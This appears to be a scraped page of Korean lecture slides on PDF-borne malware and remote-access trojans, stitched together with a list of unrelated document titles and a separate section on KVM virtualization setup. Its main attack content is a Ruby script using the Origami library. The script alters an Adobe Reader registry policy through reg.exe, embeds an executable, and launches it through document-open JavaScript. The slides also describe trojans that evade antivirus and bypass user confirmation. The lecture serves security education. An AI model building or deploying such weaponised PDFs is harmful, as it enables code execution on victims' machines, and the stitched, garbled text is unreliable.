DNS Tunneling

Similar documents
PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션


untitled

2015 경제ㆍ재정수첩

Xen으로 배우는 가상화 기술의 이해 - CPU 가상화

vm-웨어-01장

PowerPoint 프레젠테이션

PowerPoint 프레젠테이션

15 홍보담당관 (언론홍보담당) 김병호 ( 金 秉 鎬 ) 16 (행정담당) 박찬해 ( 朴 鑽 海 ) 예산담당관 17 (복지행정담당) 이혁재 ( 李 赫 在 ) 18 (보육담당) 주사 이영임 ( 李 泳 任 ) 기동근무해제. 19 (장애인담당) 박노혁 ( 朴 魯 爀 ) 기동

vm-웨어-앞부속

Red Hat Solution 및 Cloud Aug 26, 2011 Won Young Choi Solution Architect 1

KARAAUTO_1¿ù.qxd.ps, page Normalize

歯MW-1000AP_Manual_Kor_HJS.PDF

Part Part

PART

£01¦4Àå-2

½ºÅ丮ÅÚ¸µ3_³»Áö

272*406OSAKAÃÖÁ¾-¼öÁ¤b64ٽÚ

1차내지

훈련교재 목록-내지-0520.indd

Splentec V-WORM Quick Installation Guide Version: 1.0 Contact Information 올리브텍 주소 : 경기도성남시분당구구미로 11 ( 포인트타운 701호 ) URL: E-M

학교폭력표지


자식농사웹완

chungo_story_2013.pdf

*중1부

2

Çѱ¹ÀÇ ¼º°øº¥Ã³µµÅ¥

...._



전반부-pdf

표1.4출력

003-p.ps

<4D F736F F F696E74202D20312E20B0E6C1A6C0FCB8C15F3136B3E2C7CFB9DDB1E25F325FC6ED28C0BA292E >

_

12월월간보고서내지편집3

중앙도서관소식지겨울내지33

에너지포커스 2007년 가을호


01_당선자공약_서울

인권문예대회_작품집4-2




목차

A°ø¸ðÀü ³»Áö1-¼öÁ¤

±¹³»°æÁ¦ º¹»ç1

¿¡³ÊÁö ÀÚ¿ø-Âü°í ³»Áö.PDF

전반부-pdf

뉴스레터6호

Microsoft PowerPoint 하반기 크레딧 전망_V3.pptx

50차 본문 최종

양성내지b72뼈訪?303逞

³»Áöc03âš

fsb9¿ù³»ÁöÃÖÁ¾Ãâ

¾ç¼º-¾÷¹«Æí¶÷-³»¿ëÃà¼Ò4

전도대회자료집


< DBAB4B9ABC3BB5FBAB9B9ABB0FCB8AEB8C5B4BABEF32D33B1C72E706466>

표1~4

<3344C7C1B8B0C6C320BFE4BEE02D E706466>

µ¶ÀÏÅëÀÏÁý1~2Æíq36£02Ð


Microsoft PowerPoint - User Manual pptx

Oracle Database 10g: Self-Managing Database DB TSC

Macaron Cooker Manual 1.0.key

다음 사항을 꼭 확인하세요! 도움말 안내 - 본 도움말에는 iodd2511 조작방법 및 활용법이 적혀 있습니다. - 본 제품 사용 전에 안전을 위한 주의사항 을 반드시 숙지하십시오. - 문제가 발생하면 문제해결 을 참조하십시오. 중요한 Data 는 항상 백업 하십시오.

israel-내지-1-4

Áõ±ÇÁ¤º¸Ab72°»ödic143š

PowerPoint Presentation

2004 IRISPen 사용자 설명서-본문-용지크기 조정-폰트포함.PDF

최입엹죄.ps, page Normalize

Secure Programming Lecture1 : Introduction

Remote UI Guide

6주차.key

P2WW HNZ0

<4D F736F F F696E74202D2037C0E52DC4B3BDC3BFCDB8DEB8F0B8AE>

P2WW HNZ0

PowerPoint Presentation

Microsoft PowerPoint - o8.pptx

임베디드시스템설계강의자료 6 system call 2/2 (2014 년도 1 학기 ) 김영진 아주대학교전자공학과

IT현황리포트 내지 완

<4D F736F F F696E74202D C61645FB3EDB8AEC7D5BCBA20B9D720C5F8BBE7BFEBB9FD2E BC8A3C8AF20B8F0B5E55D>

Copyright 2012, Oracle and/or its affiliates. All rights reserved.,,,,,,,,,,,,,.,..., U.S. GOVERNMENT END USERS. Oracle programs, including any operat

LXR 설치 및 사용법.doc

untitled

DocsPin_Korean.pages

User's Guide

교육2 ? 그림

Microsoft PowerPoint - 02_Linux_Fedora_Core_8_Vmware_Installation [호환 모드]

AGENDA 모바일 산업의 환경변화 모바일 클라우드 서비스의 등장 모바일 클라우드 서비스 융합사례

제 정 자 : 행정안전부 국가기록원장 제 정 일 : 2008년 11월 4일(행정안전부 고시 제 호) 심의부회 : 국가기록관리위원회, 표준전문위원회 원안작성 : 국가기록원 기록정보화과 김동명(공업연구사) 검토 관리 : 국가기록원 표준협력과 김형국(학예연구관)

INSIDabcdef_:MS_0001MS_0001 시험종목 제 회리눅스마스터 급 차 시험일자 토 분 수검자기재사항및감독자확인 수검번호 감독자확인 성 명 생년월일 수검자유의사항 수험자는반드시신분증을지참하여야시험에응시할수있습니다 답안지는반드시검정필기구를사용하되 연필이나샤프


비디오 / 그래픽 아답터 네트워크 만약에 ArcGolbe를 사용하는 경우, 추가적인 디스크 공간 필요. ArcGlobe는 캐시파일을 생성하여 사용 24 비트 그래픽 가속기 Oepn GL 2.0 이상을 지원하는 비디오카드 최소 64 MB 이고 256 MB 이상을 메모리

McAfee Security Virtual Appliance 5.6 설치 안내서

기가바이트 노트북을 구매 하신 것을 축하 합니다. 이 설명서는 당신이 당신의 노트북을 시작하는 것을 도줄 것입니다. 좀더 자 세 정보는 기가바이트 웹사이트 를 방문하십시오. 모든 스펙은 선적시의 구성 장치 이며 떤 서문이나 사전 통지 없이

Transcription:

http://www.security-lab.org/origami/ Ruby 로개발됨 PDF 파일에악성프로그램을쉽게추가

%PDF-1.0 1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj 2 0 obj << /Type /Pages /Count 1 /Kids [ 3 0 R ] >> endobj 3 0 obj << >> endobj /Type /Page /Resources << /Font << /F1 << >> >> >> /Parent 2 0 R /MediaBox [ 0 0 795 842 ] /Contents 4 0 R /Type /Font /BaseFont /Helvetica /Subtype /Type1 /Name /F1

4 0 obj << /Length 55 >>stream BT /F1 15 Tf 350 750 Td 20 TL 1 Tr (I am Simple) Tj ET endstream endobj xref 0 5 0000000000 65535 f 0000000010 00000 n 0000000067 00000 n 0000000136 00000 n 0000000373 00000 n trailer << /Root 1 0 R /Size 5 >> startxref 485 %%EOF

simple.rb

script.rb

launch.rb

Stream : 모든데이터를 Stream 으로표현 텍스트, 다른파일, 비디오, 이미지등포함 Filter : 데이터표현법 ASCIIHexDecode ASCII85Decode LZWDecode FlateDecode RunLengthDecode CCITTFaxDecode JBIG2Decode DCTDecode JPXDecode

out.rb

Filter 적용

script2.rb

eicar.com 첨부

#!/usr/bin/ruby $: << "../parser" require 'parser.rb' include Origami params = Action::Launch::WindowsLaunchParams.new params.f = "reg.exe" #params.d = "C:\\Windows\\system32" params.p = "add \"HKLM\\SOFTWARE\\Policies\\Adobe\\Acrobat Reader\\9.0\\FeatureLockDown\\cDefaultLaunchAttachmentPerms\" /v tbuiltinpermlist /d \"version:1.exe:2.pdf:2\" /f" action = Action::Launch.new action.win = params

jscript = <<EOS try { this.exportdataobject({ cname: "calc.exe", nlaunch: 2 }); } catch(e) { app.alert({cmsg:"[line "+e.linenumber+"] "+e.tostring(), ctitle: e.name, nicon: 0}); } EOS

jsaction = Action::JavaScript.new(Stream.new( jscript)) pdf = PDF.read( "simple.pdf" ) attachment = pdf.attach_file("calc.exe", :EmbededName => "calc.exe") pdf.ondocumentopen(action) annot = Annotation::FileAttachment.new({:Name => Annotation::FileAttachment::Icons::PAPERCLIP, :FS => attachment}) annot.contents = "This contains an embedded file called: 'calc.exe'" annot.rect = [ 24, 600, 36, 616 ] pdf.pages.first.add_annot(annot) pdf.pages.first.onopen( jsaction) pdf.saveas("embed_calc_reader_9.pdf")

cve-2009-0927-geticon.rb Adobe Reader and Adobe Acrobat Professional < 8.1.4 사용자확인없이명령실행가능 http://www.zerodayinitiative.com/advisories

Origami 를이용하여 PDF 파일에파일첨부및첨부된파일실행가능 PDF 파일에의한보안위협확인 PDF Reader 최신버젼업데이트

Xrat Rootkit 형트로이목마 Dabaisha 조종서버정보를 2개입력가능 UPX로패킹한트로이목마생성 특이한기능제공

현재백신에검출됨

프로그램에디지털서명추가 사용자확인우회

웹캠켜기 스크린끄기 화면글쓰기 윈도우창제어

별도의시그너쳐존재하지않음

Xrat 트로이목마는은닉기능이있으나다른기능들이미약 Dabaisha 트로이목마는다양한기능제공, UPX 로패킹된파일을검출하지못한백신존재

리눅스커널에포함된첫번째가상화기법 코드의재사용 리눅스의일부이므로 host와 guest 동일 Intel VT 및 AMD-V의 VMX 지원 반드시 CPU에서 VMX가지원되어야사용가능 커널모듈 kvm.ko, kvm-intel.ko or kvm-amd.ko 사용자영역프로그램 QEMU

장점 Linux Kernel의업데이트로인한성능향상 VMX를사용하므로코드량이작음 Guest OS가하나의프로세스 (Linux 명령사용가능 ) Simple hosted virtualization 단점 Guest OS는 2040 이상의메모리를사용할수없음 안정화되고있는단계

Virtual Machine Extensions (VMX) 라불리는확장인스트럭션제공 MultiTasking HyperThreading Virtualization

Guests are scheduled as regular processes kill(1), top(1) work as expected Guest physical memory is mapped into the task's virtual memory space

KVM Part of Linux Linux scheduler, memory management Minimal impact No support for paravirtualiztion Under development Xen External hypervisor Own scheduler, memory management Intrusive Supports paravirtualization Fairly mature

Linux : opensuse 11.2 AQEMU : 0.7.3

cat /proc/cpuinfo Intel : vmx, AMD : svm 확인 BIOS 의 Advanced Processor 옵션 Intel : Intel(R) Virtualization Technology => Enable

KVM 설치 zypper install kvm QEMU 설치 zypper install qemu 커널모듈적재 (/dev/kvm 생성됨 ) modprobe kvm modprobe kvm-intel AQEMU 설치 http://sourceforge.net/projects/aqemu/files/ tar xjvpf aqemu-0.7.3-bin-static-qt-linux-32bit.tar.bz2 -C /

일반유저로로그인후 aqemu 실행

VT 기능이지원되는 CPU 에서만사용가능 일반 PC 나노트북에서는사용이불가능 Bridge 네트워크기능설정이용이하지않음 바로실무에적용하기에는많은테스트필요함